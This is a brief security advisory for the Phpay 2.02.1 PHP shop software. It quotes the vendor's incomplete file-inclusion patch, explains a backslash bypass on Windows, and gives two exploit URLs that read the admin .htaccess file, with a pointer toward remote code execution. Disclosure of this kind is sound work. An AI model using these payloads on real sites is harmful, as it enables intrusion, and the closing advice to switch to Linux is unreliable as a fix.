By Michael Brooks
Vulnerability Type:Local File Inclusion Software: Phpay Homepage:http://sourceforge.net/projects/phpay/ Version Affected:2.02.1 Phpay has been affected by multiple local file include flaws, as a result this patch was written: $config = ereg_replace(":","", $config); $config = trim(ereg_replace("../","", $config)); $config = trim(ereg_replace("/","", $config)); if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";} if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;} require("./$config"); To bypass this patch backslashes can be used instead of forward slashes on windows systems. Also .inc.php must exists *somewhere* in the string. Local File Include for windows only: http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess or if magic_quotes_gpc is turned on: http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2. Vulnerable configuration: A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue. Merry Christmas
